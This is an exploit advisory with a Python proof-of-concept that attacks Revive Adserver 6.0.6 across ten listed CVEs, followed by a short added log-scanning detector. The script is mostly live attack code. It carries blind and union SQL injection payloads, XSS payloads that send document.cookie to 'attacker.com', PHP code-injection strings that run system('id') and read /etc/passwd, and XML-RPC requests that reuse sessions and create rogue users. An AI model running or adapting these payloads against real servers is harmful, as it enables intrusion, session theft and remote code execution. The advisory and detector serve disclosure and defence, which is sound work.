Revive Adserver 6.0.6 XSS / SQL Injection / Code Execution

Published: 08 Jun 2026 00:00:00
Reported by: indoushka
Type: packetstorm
Source: packetstorm.news

Proof-of-concept for assessing and exploiting multiple vulnerabilities in Revive Adserver 6.0.6: cross-site scripting, SQL injection, and code execution.

Related CVEs (all published 5 Jun 2026):
CVE-2026-34912
CVE-2026-34913
CVE-2026-34914
CVE-2026-34915
CVE-2026-34916
CVE-2026-34917
CVE-2026-44956
CVE-2026-44958
CVE-2026-44959
CVE-2026-44961

==================================================================================================================================
    | # Title     : Revive Adserver ≤ 6.0.6 Multi-Vulnerability                                                                      |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.revive-adserver.com/                                                                                 |
    ==================================================================================================================================
    
    [+] Summary    : This Python framework is designed to assess and attempt exploitation of multiple reported vulnerabilities in a Revive Adserver deployment. 
                     It supports target discovery, optional authentication, and testing across several vulnerability categories.
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    
    import requests
    import sys
    import argparse
    import time
    import re
    from urllib.parse import urljoin, quote
    
    class ReviveExploit:
        def __init__(self, target, username=None, password=None):
            self.target = target.rstrip('/')
            self.session = requests.Session()
            self.username = username
            self.password = password
            self.cookies = {}
            self.base_paths = ['', '/revive-adserver', '/www', '/adserver', '/revive']
           
        def find_revive_path(self):
            """Find the path where Revive Adserver is installed"""
            for path in self.base_paths:
                test_urls = [
                    urljoin(self.target, f"{path}/www/index.php"),
                    urljoin(self.target, f"{path}/index.php"),
                    urljoin(self.target, f"{path}/delivery/zone-include.php")
                ]
                for url in test_urls:
                    try:
                        resp = self.session.get(url, timeout=5)
                        if "Revive Adserver" in resp.text or "zone-include" in resp.text or "adserver" in resp.text:
                            print(f"[+] تم العثور على Revive Adserver في: {url}")
                            self.revive_path = path
                            return True
                    except:
                        continue
            print("[-] No results found Revive Adserver")
            return False
        
        def login(self):
            """Log in as a regular user (Advertiser)"""
            if not self.username or not self.password:
                print("[!] Username and password not provided")
                return False
                
            login_url = urljoin(self.target, f"{self.revive_path}/www/admin/index.php")
            data = {
                'username': self.username,
                'password': self.password,
                'submit': 'Login'
            }
            
            try:
                resp = self.session.post(login_url, data=data, allow_redirects=False)
                if resp.status_code == 302 and ('PHPSESSID' in self.session.cookies or 'session' in resp.headers.get('Set-Cookie', '')):
                    print(f"[+] You have logged in as: {self.username}")
                    self.cookies = dict(self.session.cookies)
                    return True
                else:
                    print("[-] login failed")
                    return False
            except Exception as e:
                print(f"[-] mistake: {e}")
                return False
        
        def exploit_sqli_blind(self):
            """CVE-2026-34914: Blind SQL Injection in zone-include.php"""
            print("\n[+] a test Blind SQL Injection (CVE-2026-34914)...")
            
            payloads = [
    
                "1' AND (SELECT * FROM (SELECT(SLEEP(5)))a) -- -",
                "1' AND (SELECT BENCHMARK(5000000,MD5('test'))) -- -",
                "1' AND (SELECT 1 FROM users WHERE id=1)='1' -- -",
                "-1' UNION SELECT version(),user(),database() -- -"
            ]
            
            inject_url = urljoin(self.target, f"{self.revive_path}/delivery/zone-include.php")
            
            for payload in payloads:
                start_time = time.time()
                params = {'clientid': payload, 'zoneid': '1'}
                try:
                    resp = self.session.get(inject_url, params=params, timeout=10)
                    elapsed = time.time() - start_time
                    
                    if elapsed >= 4:
                        print(f"[!] SQL Injection may be present! Response time: {elapsed:.2f} seconds")
                        print(f"    Load: {payload}")
    
                    if "SQL syntax" in resp.text or "mysql_fetch" in resp.text:
                        print(f"[!] SQL error displayed! Payload: {payload}")
                        print(f"    The truncated reply: {resp.text[:200]}")
                        
                except requests.Timeout:
                    print(f"[!] The halt in demand is an indicator of SQL Injection (Time-based): {payload}")
                except Exception as e:
                    pass
                    
        def exploit_reflected_xss(self):
            """CVE-2026-34915: Reflected XSS  zone-include.php"""
            print("\n[+] Reflected XSS (CVE-2026-34915)...")
            
            xss_payloads = [
                '"><script>alert("XSS")</script>',
                '"><img src=x onerror=alert(document.cookie)>',
                "'><svg/onload=alert('XSS')>",
                '"><script>fetch("http://attacker.com/steal?c="+document.cookie)</script>',
                'javascript:alert("XSS")'
            ]
            
            inject_url = urljoin(self.target, f"{self.revive_path}/delivery/zone-include.php")
            
            for payload in xss_payloads:
                params = {'clientid': payload, 'zoneid': '1'}
                try:
                    resp = self.session.get(inject_url, params=params)
    
                    if payload.replace('"', '"') != resp.text and payload in resp.text:
                        print(f"[!] Reflected XSS Possible! Load: {payload}")
                        print(f"The load appears in the response without filtering.")
                        
                except Exception as e:
                    pass
                    
        def exploit_rce_delivery_limitations(self):
            """CVE-2026-34916 & CVE-2026-44959: RCE via delivery limitations"""
            print("\n[+] a test Remote Code Execution (CVE-2026-34916 & CVE-2026-44959)...")
            
            rce_payloads = [
    
                "'; system('id'); //",
                "'; phpinfo(); //",
                "'; echo file_get_contents('/etc/passwd'); //",
                "campaignDelimiterComponent}}]; system('id'); /*",
                "}}]; phpinfo(); /*"
            ]
    
            edit_urls = [
                urljoin(self.target, f"{self.revive_path}/www/admin/banner-edit.php"),
                urljoin(self.target, f"{self.revive_path}/www/admin/campaign-edit.php")
            ]
            
            for edit_url in edit_urls:
                for payload in rce_payloads:
                    data = {
                        'submit': 'Save',
                        'bannerid': '1',
                        'campaignid': '1',
                        'limitations[0][logical]': payload,
                        'limitations[0][component]': 'deliveryLimitations'
                    }
                    try:
                        resp = self.session.post(edit_url, data=data, cookies=self.cookies)
                        if "saved" in resp.text.lower() or "success" in resp.text.lower():
                            print(f"[!] تم حفظ الحمولة! قد يكون RCE ممكناً: {payload}")
                            print(f"    URL: {edit_url}")
                    except:
                        pass
                        
        def exploit_stored_xss_fullname(self):
            """CVE-2026-44956: Stored XSS via full name"""
            print("\n[+] Stored XSS (CVE-2026-44956) - full name...")
            
            xss_payload = '<script>new Image().src="http://attacker.com/steal?c="+document.cookie</script>'
    
            profile_url = urljoin(self.target, f"{self.revive_path}/www/admin/user-edit.php")
            data = {
                'submit': 'Save',
                'userid': '1',
                'full_name': xss_payload,
                'email': '[email protected]',
                'username': self.username
            }
            
            try:
                resp = self.session.post(profile_url, data=data, cookies=self.cookies)
                if "saved" in resp.text.lower():
                    print(f"[!] XSS has been stored in full name! Payload: {xss_payload}")
                    print("The execution will take place when the manager watches. userlog-details.php")
            except Exception as e:
                print(f"[-] mistake: {e}")
                
        def exploit_xmlrpc_session_reuse(self):
            """CVE-2026-34917: Session reuse XML-RPC"""
            print("\n[+] Improper Authentication - Session Reuse (CVE-2026-34917)...")
            
            xmlrpc_url = urljoin(self.target, f"{self.revive_path}/www/api/xmlrpc/index.php")
            xml_payload = '''<?xml version="1.0"?>
    <methodCall>
       <methodName>ox.getAdvertiserList</methodName>
       <params>
          <param><value><string>{session_id}</string></value></param>
          <param><value><string></string></value></param>
       </params>
    </methodCall>'''.format(session_id=self.cookies.get('PHPSESSID', ''))
            
            try:
                resp = self.session.post(xmlrpc_url, data=xml_payload, 
                                        headers={'Content-Type': 'text/xml'})
                if "faultCode" not in resp.text and "struct" in resp.text:
                    print("[!] The session can be reused to access the manager's API.!")
                    print(f"Reply: {resp.text[:200]}")
            except:
                pass
                
        def exploit_username_xss_bypass(self):
            """CVE-2026-44961: Bypass username verification in XML-RPC"""
            print("\n[+] Incomplete Disallowed Inputs (CVE-2026-44961)...")
            
            xmlrpc_url = urljoin(self.target, f"{self.revive_path}/www/api/xmlrpc/index.php")   
            malicious_usernames = [
                '<script>alert("XSS")</script>',
                'admin_hacker"><img src=x onerror=alert(1)>',
                '../../../../etc/passwd'
            ]
            
            for bad_user in malicious_usernames:
                xml_payload = f'''<?xml version="1.0"?>
    <methodCall>
       <methodName>ox.addUser</methodName>
       <params>
          <param><value><string>admin_session</string></value></param>
          <param><value><string>admin</string></value></param>
          <param><value><struct>
             <member><name>username</name><value><string>{bad_user}</string></value></member>
             <member><name>password</name><value><string>hacked123</string></value></member>
             <member><name>email</name><value><string>[email protected]</string></value></member>
          </struct></value></param>
       </params>
    </methodCall>'''
                
                try:
                    resp = self.session.post(xmlrpc_url, data=xml_payload,
                                            headers={'Content-Type': 'text/xml'})
                    if "faultCode" not in resp.text and "boolean" in resp.text:
                        print(f"[!] Verification was bypassed and a username was created.: {bad_user}")
                except:
                    pass
                    
        def exploit_improper_access_control(self):
            """CVE-2026-34912, CVE-2026-34913, CVE-2026-44958: Linking entities without authorization"""
            print("\n[+] اختبار Improper Access Control - Linking/Modifying without authorization...")
    
            zone_include_url = urljoin(self.target, f"{self.revive_path}/www/admin/zone-include.php")
            data = {
                'submit': 'Save',
                'zoneid': '2', 
                'bannerid': '1' 
            }
            
            try:
                resp = self.session.post(zone_include_url, data=data, cookies=self.cookies)
                if "success" in resp.text.lower() or "linked" in resp.text.lower():
                    print("[!] It was linked banner by zone The user does not own it - violation of rights!")
            except:
                pass
    
            banner_edit_url = urljoin(self.target, f"{self.revive_path}/www/admin/banner-edit.php")
            disable_data = {
                'submit': 'Save',
                'bannerid': '3', 
                'status': '0'  
            }
            
            try:
                resp = self.session.post(banner_edit_url, data=disable_data, cookies=self.cookies)
                if "success" in resp.text.lower():
                    print("[!] Disabled banner without validity (CVE-2026-44958)!")
            except:
                pass
                
        def generate_report(self):
            """Generate a comprehensive report of the discovered vulnerabilities."""
            print("\n" + "="*60)
            print("Test Report Revive Adserver")
            print("="*60)
            print(f"the goal: {self.target}")
            print(f"user: {self.username}")
            print(f"Installation path: {getattr(self, 'revive_path', 'unavailable')}")
            print("\nRecommendations:")
            print("1. Update Revive Adserver to version 6.0.7 or later")
            print("2. Change all passwords immediately")
            print("3. Check for unauthorized files or users")
            print("4. Disable the XML-RPC API if not necessary.")
            print("5. Review system logs for suspicious activity")
            print("="*60)
            
        def run_all(self):
            """Perform all tests"""
            if not self.find_revive_path():
                return
                
            if self.username and self.password:
                if not self.login():
                    print("[!] Continue without logging in...")
    
            self.exploit_sqli_blind()
            self.exploit_reflected_xss()
            self.exploit_rce_delivery_limitations()
            self.exploit_stored_xss_fullname()
            self.exploit_xmlrpc_session_reuse()
            self.exploit_username_xss_bypass()
            self.exploit_improper_access_control()
            
            self.generate_report()
    
    def main():
        parser = argparse.ArgumentParser(description='Revive Adserver <= 6.0.6 Multi-Exploit PoC')
        parser.add_argument('--target', required=True, help='Goal (example): https://example.com)')
        parser.add_argument('--username', help='regular username (Advertiser)')
        parser.add_argument('--password', help='password')
        parser.add_argument('--action', default='all', 
                           choices=['all', 'sqli', 'xss', 'rce', 'iac', 'report'],
                           help='Test type')
        
        args = parser.parse_args()
        
        exploit = ReviveExploit(args.target, args.username, args.password)
        
        if args.action == 'all':
            exploit.run_all()
        elif args.action == 'sqli':
            exploit.find_revive_path()
            exploit.exploit_sqli_blind()
        elif args.action == 'xss':
            exploit.find_revive_path()
            exploit.exploit_reflected_xss()
            exploit.exploit_stored_xss_fullname()
        elif args.action == 'rce':
            exploit.find_revive_path()
            if args.username and args.password:
                exploit.login()
            exploit.exploit_rce_delivery_limitations()
        elif args.action == 'iac':
            exploit.find_revive_path()
            if args.username and args.password:
                exploit.login()
            exploit.exploit_improper_access_control()
            exploit.exploit_xmlrpc_session_reuse()
        elif args.action == 'report':
            exploit.find_revive_path()
            exploit.generate_report()
    
    if __name__ == "__main__":
        print("""
    ╔══════════════════════════════════════════════════════════════╗
    ║            Revive Adserver Exploit PoC -                     ║
    ║       SQLi, XSS, RCE, Access Control, Auth Bypass            ║
    ║              Affected update: <= 6.0.6                       ║
    ║                    by indoushka                              ║
    ╚══════════════════════════════════════════════════════════════╝
        """)
        main()
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
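
A defender-side check for the delivery requests this PoC sends, as an added example that is not part of the original advisory or of Revive Adserver: it scans web access logs for `clientid` / `zoneid` values on `delivery/zone-include.php` that are not plain integers and labels each hit for triage. The integer-only expectation, the "combined" log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in "combined" access-log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [08/Jun/2026:10:00:01 +0000] "GET /delivery/zone-include.php?clientid=12&zoneid=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [08/Jun/2026:10:00:05 +0000] "GET /delivery/zone-include.php?clientid=1%27+AND+%28SELECT+1%29+--+-&zoneid=1 HTTP/1.1" 200 0 "-" "python-requests/2.32"
203.0.113.9 - - [08/Jun/2026:10:00:09 +0000] "GET /revive/delivery/zone-include.php?clientid=%22%3E%3Csvg%2Fonload%3D1%3E&zoneid=1 HTTP/1.1" 200 730 "-" "python-requests/2.32"
203.0.113.8 - - [08/Jun/2026:10:00:12 +0000] "GET /www/index.php?clientid=abc HTTP/1.1" 200 90 "-" "Mozilla/5.0"
"""

# Assumption: the delivery script only ever needs integer IDs in these parameters.
WATCHED_SUFFIX = "/delivery/zone-include.php"
WATCHED_PARAMS = ("clientid", "zoneid")
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
INT_RE = re.compile(r"\d{1,10}")
SQL_RE = re.compile(r"'|--|\b(select|union|sleep|benchmark)\b", re.I)


def classify(value):
    """Rough triage label for a non-integer parameter value."""
    if re.search(r'[<>"]', value):
        return "markup"
    if SQL_RE.search(value):
        return "sql"
    return "non-numeric"


def scan(log_text):
    """Return one finding per watched parameter whose decoded value is not an integer."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        url = urlsplit(m["target"])
        if not url.path.endswith(WATCHED_SUFFIX):
            continue  # only the delivery endpoint named in the advisory is watched
        # parse_qs percent-decodes values, so encoded input is compared in clear text
        query = parse_qs(url.query, keep_blank_values=True)
        for name in WATCHED_PARAMS:
            for value in query.get(name, []):
                if not INT_RE.fullmatch(value):
                    findings.append({
                        "ip": m["ip"], "time": m["ts"], "status": m["status"],
                        "param": name, "kind": classify(value), "value": value,
                    })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f'{f["time"]} {f["ip"]} {f["param"]}={f["value"]!r} -> {f["kind"]}')
```

Only query-string parameters appear in access logs; the POST-based requests in the PoC (admin edit pages, XML-RPC) need application or WAF logging to be visible.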
